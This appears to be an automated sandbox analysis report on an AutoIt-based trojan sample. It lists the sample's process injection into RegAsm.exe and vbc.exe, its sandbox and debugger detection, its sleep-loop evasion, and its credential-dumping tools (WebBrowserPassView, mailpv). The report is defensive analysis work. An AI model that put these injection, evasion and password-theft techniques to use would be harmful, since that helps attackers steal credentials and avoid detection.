Source: 5.2.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.2.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 5.0.RegAsm.exe.700000.0.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 5.2.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.2.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.2.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 5.0.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 5.0.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 5.0.RegAsm.exe.700000.0.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5.0.RegAsm.exe.700000.0.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F5A2D5 GetLastError,FormatMessageW, 1_2_00F5A2D5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004141E0 FindResourceW,SizeofResource,LoadResource,LockResource, 6_2_004141E0
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Virustotal: Detection: 40%
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Metadefender: Detection: 44%
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp1EB3.tmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp2C9A.tmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp39A1.tmp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_07860C02 AdjustTokenPrivileges, 5_2_07860C02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_07860BCB AdjustTokenPrivileges, 5_2_07860BCB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe System information queried: HandleInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\3e305278-23d3-0e99-471b-29f2d02980fa
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 6_2_00418073
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: vbc.exe, 00000006.00000000.710405266.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000002.720695334.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000006.00000000.709905577.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.729725775.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000002.744899042.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000009.00000000.730911698.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F53E91 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 1_2_00F53E91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\c7dc0042-85e5-4472-9326-a6e87cc9c990
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u206b????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.3.SecuriteInfo.com.Trojan.AutoIt.449.29642.exe.4250000.6.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u206b????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.RegAsm.exe.700000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 5.0.RegAsm.exe.700000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.RegAsm.exe.700000.0.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static file information: File size 1771008 > 1048576
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: RegAsm.exe, 00000005.00000003.702552238.0000000004223000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.934824260.00000000049B0000.00000004.00020000.sdmp
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F18B85 push ecx; ret 1_2_00F18B98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_00A4912C push ecx; retf 5_2_00A49131
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5C5C7 push ebp; ret 5_2_04B5C5D1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B5BE4C push 8BFFFFFFh; retf 5_2_04B5BE5E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52FA5 push ss; retf 5_2_04B52FA6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Code function: 5_2_04B52F1C push ss; retf 5_2_04B52F1D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00444975 push ecx; ret 6_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00444B90 push eax; ret 6_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00444B90 push eax; ret 6_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00448E74 push eax; ret 6_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0042CF44 push ebx; retf 0042h 6_2_0042CF49
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00444975 push ecx; ret 9_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00444B90 push eax; ret 9_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00444B90 push eax; ret 9_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00448E74 push eax; ret 9_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0042CF44 push ebx; retf 0042h 9_2_0042CF49
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00444975 push ecx; ret 18_2_00444985
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00444B90 push eax; ret 18_2_00444BA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00444B90 push eax; ret 18_2_00444BCC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00448E74 push eax; ret 18_2_00448E81
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0042CF44 push ebx; retf 0042h 18_2_0042CF49
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_004443B0

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00443A61 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00443A61
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RegAsm.exe, 00000005.00000002.933559504.00000000029C3000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe, 00000005.00000002.933559504.00000000029C3000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe TID: 6120 Thread sleep count: 419 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe TID: 6120 Thread sleep count: 6499 > 30 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe TID: 6120 Thread sleep time: -64990s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6784 Thread sleep count: 181 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6784 Thread sleep time: -181000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5476 Thread sleep time: -120000s >= -30000s Jump to behavior
Sleep loop found (likely to delay execution)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Thread sleep count: Count: 6499 delay: -10 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040978A
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Window / User API: threadDelayed 419 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Window / User API: threadDelayed 6499 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Thread delayed: delay time: 60000 Jump to behavior
Source: bhv7420.tmp.6.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20211210T130248Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=181bf87b454c47dfab7d24a7ffc2f2d2&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1291370&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1291370&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: RegAsm.exe, 00000005.00000002.933194657.0000000000ACE000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0041829C memset,GetSystemInfo, 6_2_0041829C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen, 6_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408CAC FindFirstFileW,FindNextFileW,FindClose, 6_2_00408CAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen, 9_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 9_2_00408CAC FindFirstFileW,FindNextFileW,FindClose, 9_2_00408CAC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen, 18_2_0040938F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00408CAC FindFirstFileW,FindNextFileW,FindClose, 18_2_00408CAC

Anti Debugging:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 6_2_0040978A
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_004443B0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_3_00EB00BE mov esi, dword ptr fs:[00000030h] 1_3_00EB00BE
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00F25CCC
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00F25CCC
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Code function: 1_2_00F1A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00F1A395

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 700000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.449.29642.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 700000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
